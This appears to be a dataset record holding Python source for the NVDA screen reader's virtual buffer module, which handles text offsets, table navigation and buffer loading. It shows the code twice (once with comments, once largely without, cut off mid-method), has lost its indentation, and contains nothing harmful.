def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
"""Gets the placeholder attribute to be used.
@return: The placeholder attribute when there is no content within the ControlField.
None when the ControlField has content.
@note: The content is considered empty if it holds a single space.
"""
placeholder = attrs.get(placeholderAttrsKey)
# For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
if not placeholder:
return None
# Get the start and end offsets for the field. This can be used to check if the field has any content.
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen: # value is empty, use placeholder
return placeholder
# Because fetching the content of the field could result in a large amount of text
# we only do it in order to check for space.
# We first compare the length by comparing the offsets, if the length is less than 2 (ie
# could hold space)
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in range(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
#Use VBuf_getBufferLineOffsets with out screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
# convert some table attributes to ints
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
attrs['alwaysReportName'] = True
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == textInfos.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == textInfos.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(info=self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
# The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=str(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
@abstractmethod
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
@abstractmethod
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self, textRange):
return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self, textRange):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in textRange.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
if not self.VBufHandle:
# #4859: The buffer was unloaded after this method was queued.
return
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
def _isNVDAObjectInApplication_noWalk(self, obj):
inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
if inApp is not None:
return inApp
# If the object is in the buffer, it's definitely not in an application.
try:
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
except:
log.debugWarning("getIdentifierFromNVDAObject failed. "
"Object probably died while walking ancestors.", exc_info=True)
return None
node = VBufRemote_nodeHandle_t()
if not self.VBufHandle:
return None
try:
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
except WindowsError:
return None
if node:
return False
return None
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
| 38.906722
| 212
| 0.741776
|
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
ord(u":"): r"\\:",
ord(u";"): r"\\;",
ord(u"\\"): u"\\\\\\\\",
}
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
attribs = (attribs,)
for option in attribs:
for name in option:
reqAttrs.append(name)
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getBoundingRectFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o:
raise LookupError("no NVDAObject at offset %d" % offset)
if o.hasIrrelevantLocation:
raise LookupError("Object is off screen, invisible or has no location")
return o.location
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
placeholder = attrs.get(placeholderAttrsKey)
if not placeholder:
return None
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen:
return placeholder
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in range(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
attrs['alwaysReportName'] = True
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == textInfos.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == textInfos.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(info=self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
